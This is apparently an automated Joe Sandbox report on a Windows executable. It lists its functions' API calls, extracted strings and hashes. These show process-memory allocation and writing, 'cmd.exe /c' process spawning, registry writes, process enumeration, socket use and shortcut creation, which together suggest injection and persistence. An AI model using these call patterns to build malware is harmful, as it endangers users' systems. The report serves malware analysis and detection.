                                                                  • Part of subcall function 004CC470: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CC4B4
                                                                  • Part of subcall function 004CC470: TranslateMessage.USER32(?), ref: 004CC4BB
                                                                  • Part of subcall function 004CC470: DispatchMessageA.USER32(?), ref: 004CC4C2
                                                                  • Part of subcall function 004CC470: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CC4D1
                                                                • htons.WS2_32(00000000), ref: 0046C053
                                                                • htons.WS2_32(00000000), ref: 0046C506
                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00001000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000), ref: 0046C75E
                                                                • WSACleanup.WS2_32 ref: 0046E0AE
                                                                  • Part of subcall function 00442748: FindWindowA.USER32(ENewFrame,00000000), ref: 0044276C
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(?,0000E81E), ref: 004427A0
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,00000082), ref: 004427D4
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,00000000), ref: 00442808
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,000003E8), ref: 0044283C
                                                                  • Part of subcall function 00442748: GetDlgItem.USER32(00000000,000003F3), ref: 00442870
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ItemMessage$Peekhtons$CleanupCloseDispatchFindHandleStartupTranslateWindow
                                                                • String ID: File$getpeername$getsockname$getsockopt$ws2_32.dll
                                                                • API String ID: 3342885501-4256197169
                                                                • Opcode ID: 4e444177535f8eda41ff0d8c0406f3ccc8da823b798cb90c7ae1dd81d3374b03
                                                                • Instruction ID: 187566758ff3a2b99a99f1babb5daabd8b03c1dec10149d3d3974b50723ab665
                                                                • Opcode Fuzzy Hash: 4e444177535f8eda41ff0d8c0406f3ccc8da823b798cb90c7ae1dd81d3374b03
                                                                • Instruction Fuzzy Hash: E40382B5F40304ABEB00DBA5DCC6B9D77B4EB18304F14003AE609EB396E6B95E54CB56
                                                                APIs
                                                                • DuplicateHandle.KERNEL32(?,?,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0046CD94
                                                                • htons.WS2_32(00000000), ref: 0046D96F
                                                                • htons.WS2_32(00000000), ref: 0046DE22
                                                                • CloseHandle.KERNEL32(?,?,?,00001000), ref: 0046E07A
                                                                • WSACleanup.WS2_32 ref: 0046E0AE
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Handlehtons$CleanupCloseDuplicate
                                                                • String ID: %$getpeername$getsockname$getsockopt$ws2_32.dll
                                                                • API String ID: 2810787018-689003843
                                                                • Opcode ID: 9ebc400ad9e445c90332a2ce6a3fc7ff7e044dc692d7ad1d83d7606a8b8c5d5f
                                                                • Instruction ID: 5d3d9513ca2c89cd0735b70983276887c772057f47328f280fc7ec6634647cb3
                                                                • Opcode Fuzzy Hash: 9ebc400ad9e445c90332a2ce6a3fc7ff7e044dc692d7ad1d83d7606a8b8c5d5f
                                                                • Instruction Fuzzy Hash: 2AE26CB5F40308ABDB00DBD5DCC6F9DB7B0EB18305F54002AE209EB296E6B95E45CB16
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0048A790
                                                                  • Part of subcall function 004CDCB0: VariantClear.OLEAUT32(00000000), ref: 004CDD69
                                                                • CoUninitialize.COMBASE ref: 0048AA12
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClearInitializeUninitializeVariant
                                                                • String ID: Adodb.Stream$Charset$Close$Mode$Open$Position$ReadText$Type$Write$unicode
                                                                • API String ID: 2180264264-1776227048
                                                                • Opcode ID: b4f3e9f14be26f178d51719b3682ed596969d0e67cb4d75c284ed9108951934e
                                                                • Instruction ID: 375b91bc34b8ac8173ad104b9d8f620858f81b1e6eba6ff862035bac32b34cfc
                                                                • Opcode Fuzzy Hash: b4f3e9f14be26f178d51719b3682ed596969d0e67cb4d75c284ed9108951934e
                                                                • Instruction Fuzzy Hash: DC8184B5FC03047BFB65AA918C97F9D7665A718B04F200029FB047E2C2E6F56A50C75E
                                                                APIs
                                                                • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0044C80A
                                                                • VirtualAllocEx.KERNEL32(FFFFFFFF,00000000,00000000,?,00000040,00001000,00002000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C962
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocCopyFileVirtual
                                                                • String ID: Z$gdi32.dll$ntdll.dll$user32.dll$w
                                                                • API String ID: 3677450340-2712310420
                                                                • Opcode ID: ed3d05729d53902743e5085e851c36b0df867fbc1e49c5c1751a8430c5e9450c
                                                                • Instruction ID: 295ba64ebb2a8ddbfe9c63ff85f8e482733e26e3ceef9124551968dff7fe0d33
                                                                • Opcode Fuzzy Hash: ed3d05729d53902743e5085e851c36b0df867fbc1e49c5c1751a8430c5e9450c
                                                                • Instruction Fuzzy Hash: 1D63D4B1F40215ABFB14DBA5DC86B9EB7B5FB08314F24002AF604FB391E6B99D058B15
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004D3E80,?,Microsoft Visual C++ Runtime Library,00012010,?,004E7CEC,?,004E7D3C,?,?,?,Runtime Error!Program: ), ref: 004DA1F1
                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004DA209
                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004DA21A
                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004DA227
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad
                                                                • String ID: <}N$GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                • API String ID: 2238633743-3177214689
                                                                • Opcode ID: ee20033987df0984e7fd70fdd3dd5ea90822f9bd7efdd1556f60eb8e781ef18c
                                                                • Instruction ID: be1df7db0b5c09006bfc2b525cece0a050a13f6111ebc6972abd9f1f436f228b
                                                                • Opcode Fuzzy Hash: ee20033987df0984e7fd70fdd3dd5ea90822f9bd7efdd1556f60eb8e781ef18c
                                                                • Instruction Fuzzy Hash: 5701D831605702AB8B10DFB66D90F1B3AD9DF59750304046BB506C2321DAB99928DF65
                                                                APIs
                                                                • FindWindowA.USER32(ENewFrame,00000000), ref: 0044276C
                                                                • GetDlgItem.USER32(?,0000E81E), ref: 004427A0
                                                                • GetDlgItem.USER32(00000000,00000082), ref: 004427D4
                                                                • GetDlgItem.USER32(00000000,00000000), ref: 00442808
                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 0044283C
                                                                • GetDlgItem.USER32(00000000,000003F3), ref: 00442870
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 00442922
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Item$FindWindowlstrcpyn
                                                                • String ID: ENewFrame
                                                                • API String ID: 2863136210-866728150
                                                                • Opcode ID: 98b19f5f67185aa5e039c11d00c1fadf1750bd8dca874c8b760ceda224ea17ec
                                                                • Instruction ID: d378e6205c07dc1453a05f635d3d79dd5f2909cbaf826f61310f6bdcdd57a539
                                                                • Opcode Fuzzy Hash: 98b19f5f67185aa5e039c11d00c1fadf1750bd8dca874c8b760ceda224ea17ec
                                                                • Instruction Fuzzy Hash: 93515F74E80305BBEB00AF91DD4BB6DBB70AB06721F40906AF1083A1D1D7B54B508F9E
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004C036A
                                                                Strings
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID: '$u
                                                                • API String ID: 1951056069-331672930
                                                                • Opcode ID: 26023d8b7e58ca016e934d13238cb56d070382c71a77a40d83c306161d3bb78a
                                                                • Instruction ID: 3f404da0f855f2c5c69f31bd84441b0c590d82e6ca3be49810bad399dc1d6898
                                                                • Opcode Fuzzy Hash: 26023d8b7e58ca016e934d13238cb56d070382c71a77a40d83c306161d3bb78a
                                                                • Instruction Fuzzy Hash: 3DF2BF78E04248EFEF509F91DC85FAE7BB0FF09304F10005AE5417A2A6D7B959A5CB1A
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0041CB1A
                                                                Strings
                                                                • MSScriptControl.ScriptControl, xrefs: 0041CB58
                                                                • Eval, xrefs: 0041CC5F
                                                                • Language, xrefs: 0041CBAB
                                                                • var , xrefs: 0041CC2F
                                                                • AddCode, xrefs: 0041CBEC
                                                                • function get__nodeValue(str_json,recursion){for(var i in str_json){var a=Object.prototype.toString.call(str_json[i]);if(a=="[object Object]"||a=="[object Array]"){if(recursion){get__nodeValue(str_json[i],recursion)}}else if(a=="[object String]"||a=="[object Nu, xrefs: 0041CBE0
                                                                • JavaScript, xrefs: 0041CB9F
                                                                • = {}, str_Code = String.fromCharCode(9216), str_reg = new RegExp(str_Code, 'g'), xrefs: 0041CC25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: = {}, str_Code = String.fromCharCode(9216), str_reg = new RegExp(str_Code, 'g')$AddCode$Eval$JavaScript$Language$MSScriptControl.ScriptControl$function get__nodeValue(str_json,recursion){for(var i in str_json){var a=Object.prototype.toString.call(str_json[i]);if(a=="[object Object]"||a=="[object Array]"){if(recursion){get__nodeValue(str_json[i],recursion)}}else if(a=="[object String]"||a=="[object Nu$var
                                                                • API String ID: 2538663250-2654358664
                                                                • Opcode ID: 1d1310e4ac4fc97b0947317aff526f91825837d4607a436115a7b746fff16ed3
                                                                • Instruction ID: 24cce2134c01d221050d30b612f51e52db9d720af8c72c4253d44875d8cb6bc6
                                                                • Opcode Fuzzy Hash: 1d1310e4ac4fc97b0947317aff526f91825837d4607a436115a7b746fff16ed3
                                                                • Instruction Fuzzy Hash: D141FB70F80318BBEB11DE91DCC2F997720AB19B55F605065FB043F2C2D2B96A509BA9
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004843BE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID: .lnk$CreateShortcut$TargetPath$WshShell$a5H$wshom.ocx
                                                                • API String ID: 2538663250-3272274830
                                                                • Opcode ID: 1c00ac6332f443c0f02dc4059b7789810e49503227b15afd75e69efd0ec3108f
                                                                • Instruction ID: 838c4f81521e202fdc8917d5353b3ed106abfbd60f702f09bfe244e0d7279858
                                                                • Opcode Fuzzy Hash: 1c00ac6332f443c0f02dc4059b7789810e49503227b15afd75e69efd0ec3108f
                                                                • Instruction Fuzzy Hash: 4B41D7B4F80304BBF761AA959C43F6D76649718B18F20406AFB047E2C2E6F56E50875E
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,004FEE86,004FEE8E,00000000), ref: 004B4532
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004B4719
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MemoryMovelstrlen
                                                                • String ID: \$]
                                                                • API String ID: 456560858-2127938089
                                                                • Opcode ID: 7e487d9619168f8c878125d6f25fa9446b778675d83d92a84d314e00d37673bb
                                                                • Instruction ID: fecb142ee1be013bd6d1529f7c08e9672d50dee9e9dd88d70854cdb4bb6ba67e
                                                                • Opcode Fuzzy Hash: 7e487d9619168f8c878125d6f25fa9446b778675d83d92a84d314e00d37673bb
                                                                • Instruction Fuzzy Hash: 1B12C230D04A0CEBDF10AFD2E9497EDBB74FF88304F218099E19175196CB795A65DB28
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID: getpeername$getsockname$ws2_32.dll
                                                                • API String ID: 0-838878439
                                                                • Opcode ID: 61d78212e67c447dab4d2183a6dab53c33a02aaa6f00942ce58c5c4d72f8fc88
                                                                • Instruction ID: 0dc56ae39d8f86d452794faa6f93f2ecd37b2508afc82bff44ca603aa3f69cf1
                                                                • Opcode Fuzzy Hash: 61d78212e67c447dab4d2183a6dab53c33a02aaa6f00942ce58c5c4d72f8fc88
                                                                • Instruction Fuzzy Hash: 4FB22FB5A00315ABEF50DF95DCC5B9EB7F8EB0D314F14042AE905BB352E6799D008B2A
                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00484F2B
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000), ref: 0048506D
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 004851F9
                                                                • CallWindowProcA.USER32(00668787,00000000,?,00000001,00000000), ref: 0048524A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CallCreateNamedPeekPipeProcProcessWindowlstrcpyn
                                                                • String ID: cmd.exe /c
                                                                • API String ID: 3413392740-3798715461
                                                                • Opcode ID: d6c6a1667658be1e546dc342c56ac357c93b63279e7563adc2836efd9e185868
                                                                • Instruction ID: ab92fca58498fc1924689056b9499e5cecc841b96ee57d45f8658c8331e1d7d3
                                                                • Opcode Fuzzy Hash: d6c6a1667658be1e546dc342c56ac357c93b63279e7563adc2836efd9e185868
                                                                • Instruction Fuzzy Hash: 97627EB1E41305ABEB00EF95ECC6B9EB7B5EB09314F141429F905BB381E379A910CB59
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 004AA866
                                                                • SetProcessAffinityMask.KERNEL32(FFFFFFFF,FFFFFFFF), ref: 004AAAB8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: AffinityCurrentMaskProcessThread
                                                                • String ID: ],rax$mov [0x$ret
                                                                • API String ID: 3622693022-2134748970
                                                                • Opcode ID: 1ae453a3dcb403751e804d1bef97addfa422179fa1e9c94cad3adacb3b83b762
                                                                • Instruction ID: dfc63a8e7e60f75f3b939ed51e374e43ae5ab97b189047feb82918aa96917c69
                                                                • Opcode Fuzzy Hash: 1ae453a3dcb403751e804d1bef97addfa422179fa1e9c94cad3adacb3b83b762
                                                                • Instruction Fuzzy Hash: E3325EB1A40208AFEB10DFA8DC81FAE7BB5EF19314F144119F614BB391D379A950CB69
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004602B0
                                                                • Process32First.KERNEL32(00000000,00000000), ref: 00460383
                                                                • CloseHandle.KERNEL32(00000000), ref: 00460547
                                                                • Process32Next.KERNEL32(00000000,00000000), ref: 00460611
                                                                • CloseHandle.KERNEL32(00000000), ref: 004606FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1789362936-0
                                                                • Opcode ID: f703beaa3f9aeffefffc974c2871b68232af773f08d5c652aa7cadf1cd85846a
                                                                • Instruction ID: c1a93710d61ed2eabfc36d62ce33f0d4d879a71da2f6fc480fa189e9640fceb6
                                                                • Opcode Fuzzy Hash: f703beaa3f9aeffefffc974c2871b68232af773f08d5c652aa7cadf1cd85846a
                                                                • Instruction Fuzzy Hash: 3CE151F1A402469BFB00DF98DCC1B6AB7B0EF59324F180435E506AB341E379B960CB56
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID: S&h$a&h$o&h$}&h$}&h
                                                                • API String ID: 3559483778-3193924603
                                                                • Opcode ID: 3ce1dd03fe71b2803ef2739e4467677a3dbaeef5d20290f2331be66fc4bf1366
                                                                • Instruction ID: 0ac220fd7c3496660519a580b874d2e10d4488ea8239d481055ca088058f3e98
                                                                • Opcode Fuzzy Hash: 3ce1dd03fe71b2803ef2739e4467677a3dbaeef5d20290f2331be66fc4bf1366
                                                                • Instruction Fuzzy Hash: FF822CB6A00205AFEB50EFA9DCC5BEFB7F8EB49315F14042AE604E7242D6349D118B75
APIs
• FindWindowA.USER32(Notepad,00000000), ref: 00456818
• GetDlgItem.USER32(?,0000000F), ref: 0045684C
• lstrcpyn.KERNEL32(00000000,00000000,00000000), ref: 004568FE
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: FindItemWindowlstrcpyn
• String ID: Notepad
• API String ID: 3951413068-311999004
• Opcode ID: f83f8e0cc82985009841a82288eb73f602e43f4cea1c31e0691253b60d17bc33
• Instruction ID: bf20f17e1ae9199014fe6291792054e7db79045e83e8598795d6c0681024b63b
• Opcode Fuzzy Hash: f83f8e0cc82985009841a82288eb73f602e43f4cea1c31e0691253b60d17bc33
• Instruction Fuzzy Hash: 3F316074E40309BBDB10AF91DC0BBAEBB31AB06711F44506AF6043A1D1D3B65A24CF9A
APIs
• GetModuleHandleA.KERNEL32(user32.DLL,?,0043C795,00000000,?), ref: 0043C810
• GetProcAddress.KERNEL32(00000000,wsprintfA), ref: 0043C844
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: user32.DLL$wsprintfA
• API String ID: 1646373207-3653994968
• Opcode ID: dfafbff2654b82a22ea1829939c6bdd63fcb1cca63b5f382e424d34a7353dad7
• Instruction ID: f2e47ace501a0477dcc52f30a64c43e12f5837c61600fcec98973547d5e07530
• Opcode Fuzzy Hash: dfafbff2654b82a22ea1829939c6bdd63fcb1cca63b5f382e424d34a7353dad7
• Instruction Fuzzy Hash: 3E012C74E00208FFCB10EF95EC4ABAEBB74BB0A711F005065F904BB290D3B58A10CB99
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,00429A2A), ref: 0041ABF9
• GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 0041AC2D
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RegSetValueExA$kernel32.dll
• API String ID: 1646373207-1396291221
• Opcode ID: 6beabbcf7b221807771d0892331222e3f34b8d524521140fc2f6234c573d3bce
• Instruction ID: 93cec9d62f47fb63bb88bf8370e06111439822ea48c4d37c84943e4b9941b9ee
• Opcode Fuzzy Hash: 6beabbcf7b221807771d0892331222e3f34b8d524521140fc2f6234c573d3bce
• Instruction Fuzzy Hash: 46F04F70E45304FBC7109F52A9077ADBA719706701F1051BBB5087B291E67945609EAF
APIs
• CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,?,0040E152,00000000,00000001,00000001,00000000,00000001), ref: 0040E1F4
• Process32FirstW.KERNEL32(000000FF,00000000), ref: 0040E2D1
• Process32NextW.KERNEL32(000000FF,00000000), ref: 0040E503
• CloseHandle.KERNEL32(000000FF,?,?,?,?,?,0040E152,00000000,00000001,00000001,00000000,00000001), ref: 0040E5ED
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 4268c1523dba11c55aa05e80329bed69229e4c20054c43d12c5a505e2f0c0522
• Instruction ID: 4a5e3fd28557056d0a7944e6af76196707c194f6f68b4348717bf49d1dd5a724
• Opcode Fuzzy Hash: 4268c1523dba11c55aa05e80329bed69229e4c20054c43d12c5a505e2f0c0522
• Instruction Fuzzy Hash: E4E14BB1A402569FEF00CF98ECC1B59B7B1EF59324F290475E906AB341D378B961CB62
APIs
• lstrlenW.KERNEL32(00000000,00000000), ref: 0041A471
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 0041A4DF
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000,00000000,00000000), ref: 0041A56E
• strlen.MSVCRT ref: 0041A59A
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: ByteCharMultiWide$lstrlenstrlen
• String ID:
• API String ID: 1146637441-0
• Opcode ID: 0c658b49e81a3c6713a23b9e0b56cce7759df2fd06cb7deecbafc417db31bf50
• Instruction ID: 1ed418b653a11b3f03245520fcd6893037fe7db592e68cde69156d2519bd1c9a
• Opcode Fuzzy Hash: 0c658b49e81a3c6713a23b9e0b56cce7759df2fd06cb7deecbafc417db31bf50
• Instruction Fuzzy Hash: F55164B1E00319BBDF00DF95DC87BEFBBB5AB05714F14006AF604BA281D7795A508B9A
APIs
• GetProcessHeap.KERNEL32(?,?,?,?,?,?,00409A6D), ref: 0040A3B5
• RtlAllocateHeap.NTDLL(00000000,00000000,00409A6D), ref: 0040A3FC
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00409A6D), ref: 0040A440
• RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,00000000), ref: 0040A4DB
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: Heap$Allocate$ByteCharMultiProcessWide
• String ID:
• API String ID: 2529488297-0
• Opcode ID: 281a9d8b47f1579c2cf343d601bb36557cd907a5c85c17517ed2d3169f472379
• Instruction ID: 9704ec77b6c188b33aee6395679cd38600c11a93d96f49f18eb5294d2730441b
• Opcode Fuzzy Hash: 281a9d8b47f1579c2cf343d601bb36557cd907a5c85c17517ed2d3169f472379
• Instruction Fuzzy Hash: 09412974E40319FBDB009F90DD46BAEBB71FB0A704F104066FA047A2D1D3B95A60DB9A
APIs
• RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 004AC432
• RtlMoveMemory.NTDLL(00000000,?,00000108), ref: 004AC8D7
